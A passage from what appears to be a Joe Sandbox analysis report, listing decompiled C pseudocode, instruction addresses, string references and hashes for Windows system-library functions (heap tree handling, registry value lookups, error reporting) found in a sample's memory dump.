					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01759830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01759990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017595D0();
							goto L11;
						} else {
							_t109 = L01734620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0175F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017595D0();
										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0174f0d3
0x0174f0d9
0x0174f0e0
0x0174f0e7
0x0174f0f2
0x0174f0f4
0x0174f0f8
0x0174f100
0x0174f108
0x0174f10d
0x0174f115
0x0174f116
0x0174f11f
0x0174f123
0x0174f124
0x0174f12c
0x0174f130
0x0174f134
0x0174f13d
0x0174f144
0x0174f14b
0x0174f152
0x0178bab0
0x0178bab0
0x0174f158
0x0174f158
0x0174f15a
0x0174f160
0x0174f165
0x0174f166
0x0174f16f
0x0174f173
0x0178baa7
0x0178baa7
0x0178baab
0x00000000
0x0174f179
0x0174f18d
0x0174f191
0x0178baa2
0x00000000
0x0174f197
0x0174f19b
0x0174f1a2
0x0174f1a9
0x0174f1af
0x0174f1b2
0x0174f1b6
0x0174f1b9
0x0174f1c4
0x0174f1d8
0x0174f1df
0x0174f1e3
0x0174f1eb
0x0174f1ee
0x0174f1f4
0x0174f20f
0x0178bab7
0x0178babb
0x0178bacc
0x0178bad1
0x0174f215
0x0174f218
0x0174f226
0x0174f22b
0x00000000
0x0174f22b
0x0174f1f6
0x0174f1f6
0x0174f1f9
0x0174f1fb
0x0174f1fb
0x0174f1f4
0x0174f191
0x0174f173
0x0174f152
0x0174f203

Strings

@, xrefs: 0174F124

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: f26f199c98f980477e4ab74480e0f4fc46802521db0024fbe3ec7e5983912ba6
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: E3516971504715AFC321DF29C840A6BFBF8FF88710F00892AFA9597690E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01793540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01793540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x180d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01750BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L01793706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0175FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01793540;
						E0175FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						L0176DDD0( &_v1072, _t75, _t79, _t80, _t81);
						L017A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L017597C0();
					}
					return L0175B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01793971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01793884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0175FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L01759650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L01793787(_a4,  &_v352, _t80);
						}
					}
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01793552
0x0179355a
0x0179355d
0x01793566
0x01793567
0x0179357e
0x0179358f
0x017935a1
0x017935a5
0x0179366b
0x0179366b
0x0179366d
0x01793672
0x01793679
0x01793685
0x0179368d
0x0179369d
0x017936a7
0x017936b8
0x017936c6
0x017936c7
0x017936dc
0x017936e1
0x017936e7
0x017936e9
0x017936e9
0x01793703
0x01793703
0x017935b5
0x017935c0
0x017935c4
0x00000000
0x00000000
0x017935ca
0x017935d7
0x017935e2
0x017935e6
0x017935e8
0x017935f5
0x017935fa
0x01793603
0x01793604
0x01793609
0x0179360a
0x01793612
0x01793613
0x0179361e
0x01793622
0x01793628
0x0179362f
0x0179362f
0x01793636
0x01793638
0x0179363b
0x01793642
0x01793642
0x01793636
0x01793657
0x01793657
0x0179365c
0x01793662
0x01793669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0179358F

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 14b7ec2463c5fc0c592fd187d355bad9d6cba2a5bc309169ffe5b8e234645ea0
Instruction ID: 45bf849c661c12e1ac933a4a115b32ecdfe004021a2adab3c446e3266a2eb388
Opcode Fuzzy Hash: 14b7ec2463c5fc0c592fd187d355bad9d6cba2a5bc309169ffe5b8e234645ea0
Instruction Fuzzy Hash: 3E4124B1D0152DABDF21DA60DC84FAEF77CAB54714F0045A5EA09AB240DB709E888F95

Uniqueness

Uniqueness Score: -1.00%

Function 01793884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01793884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L01759650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01734620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L01759650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01793893
0x01793896
0x01793899
0x0179389f
0x017938a0
0x017938a4
0x017938a9
0x017938ac
0x017938ad
0x017938ae
0x017938af
0x017938b1
0x017938b4
0x017938bb
0x017938bc
0x017938bd
0x017938c4
0x017938c8
0x017938ca
0x017938ca
0x017938d5
0x0179393e
0x01793940
0x01793942
0x01793952
0x01793954
0x01793961
0x01793961
0x01793967
0x0179396e
0x0179396e
0x01793947
0x0179394c
0x00000000
0x0179394c
0x017938ea
0x017938ee
0x017938f8
0x017938f9
0x017938ff
0x01793900
0x01793902
0x01793903
0x0179390b
0x0179390f
0x01793950
0x00000000
0x01793950
0x01793915
0x0179391d
0x0179391d
0x01793922
0x01793926
0x00000000
0x01793928
0x0179392b
0x0179392b
0x01793935
0x01793937
0x01793937
0x00000000
0x01793935
0x01793926
0x017938f0
0x00000000

Strings

BinaryName, xrefs: 017938B4

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 5a18e9d33ed803301bd73229ae4d8532619fb192b8447dab582ff048c33912e3
Instruction ID: 3fdb1a667a45508d9d30bd464a2e23d8141080880b13d671268e004477774d02
Opcode Fuzzy Hash: 5a18e9d33ed803301bd73229ae4d8532619fb192b8447dab582ff048c33912e3
Instruction Fuzzy Hash: E431F17290051AAFEF15DB68D945E7BFB74FB80B38F014169EA04A7241D7309E08C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0174D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0174D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x180d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01734120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L0175B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017595D0();
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0174d29c
0x0174d2a6
0x0174d2b1
0x0174d2b5
0x0174d2b6
0x0174d2bc
0x0174d2bd
0x0174d2be
0x0174d2bf
0x0174d2c2
0x0174d2c4
0x0174d2cc
0x0174d384
0x0174d34b
0x0174d34f
0x0174d350
0x0174d351
0x0174d35c
0x0174d35c
0x0174d2d6
0x0174d2da
0x0174d2e1
0x0174d361
0x0174d369
0x0174d36d
0x0174d2e3
0x0174d2e3
0x0174d2e3
0x0174d2e5
0x0174d2ed
0x0174d2f5
0x0174d2fa
0x0174d302
0x0174d303
0x0174d30b
0x0174d30f
0x0174d313
0x0174d318
0x0174d31c
0x0174d320
0x0174d379
0x0174d37d
0x00000000
0x00000000
0x0178affe
0x0178b001
0x0178b011
0x00000000
0x0174d322
0x0174d322
0x0174d330
0x0174d337
0x0174d35d
0x0174d339
0x0174d33f
0x0174d38c
0x0174d38c
0x0174d33f
0x0174d349
0x00000000
0x0174d349

Strings

@, xrefs: 0174D303

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 540f478f3c2394a3a0311829671666a785224e166faae598b0853c649f7dbf2c
Instruction ID: 838ff5c54d5d90d7bf912c9c0be1768cd03b88fb3fce44b08c539895f6d2e1af
Opcode Fuzzy Hash: 540f478f3c2394a3a0311829671666a785224e166faae598b0853c649f7dbf2c
Instruction Fuzzy Hash: 8F318DB1548305DFC361DF68C984A6BFBE8EBA9654F00092EF9D583251E734DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01721B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01721B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0175BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0175A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0175A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01734620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01721b8f
0x01721b9a
0x01721b9c
0x01721b9e
0x01721ba3
0x01777010
0x01777010
0x00000000
0x01721ba9
0x01721ba9
0x01721bae
0x00000000
0x01721bc5
0x01721bca
0x01721bcf
0x01721bd0
0x01721bd1
0x01721bd2
0x01721bd6
0x01721bdc
0x01721be0
0x01776ffc
0x01777000
0x00000000
0x01777006
0x01777009
0x01777009
0x01721be6
0x01721bec
0x01721c0b
0x01721c0b
0x01721c0c
0x01721c11
0x01721c12
0x01721c15
0x01721c1b
0x01721c1f
0x01721c31
0x01721c33
0x01777026
0x01777026
0x01721c21
0x01721c24
0x01721c24
0x01721bee
0x01721bee
0x01721bf2
0x01721c3a
0x01721bf4
0x01721bf4
0x01721c05
0x01721c05
0x01721c09
0x01721c3e
0x00000000
0x00000000
0x00000000
0x01721c09
0x01721bec
0x01721be0
0x01721bae
0x01721c2e

Strings

WindowsExcludedProcs, xrefs: 01721BC5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 5b877faa07212c4f292fb337010d259323e87378940d9e1e1b5908d5927b844f
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 0621F27A901239ABDF229A598844F6FFBADFF80A50F1544A5FE048B204E630DC02D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 017C8DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E017C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x17f0d50);
				E0176D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					L017A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0176DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0176DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0176D130(_t34, _t39, _t40);
			}

0x017c8df1
0x017c8df1
0x017c8df1
0x017c8df1
0x017c8df1
0x017c8df1
0x017c8df3
0x017c8df8
0x017c8dfd
0x017c8e00
0x017c8e0e
0x017c8e2a
0x017c8e36
0x017c8e38
0x017c8e3c
0x017c8e46
0x017c8e46
0x017c8e36
0x017c8e50
0x017c8e56
0x017c8e59
0x017c8e5c
0x017c8e60
0x017c8e67
0x017c8e6d
0x017c8e73
0x017c8e74
0x017c8eb1
0x017c8ebd

Strings

Critical error detected %lx, xrefs: 017C8E21

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: c545a637ae258bfa3990a7e70bec44e05c137dcc51e54331537cfec9a65f900d
Instruction ID: 587bd6eb65adf29946d94c7844368c6c55e803bfa2ab679b86252484f5f7d243
Opcode Fuzzy Hash: c545a637ae258bfa3990a7e70bec44e05c137dcc51e54331537cfec9a65f900d
Instruction Fuzzy Hash: 141139B1D14348DADB25CFE9C9097EDFBB4AB18715F24425DD5696B382C3740601CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0171F900 Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0171F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
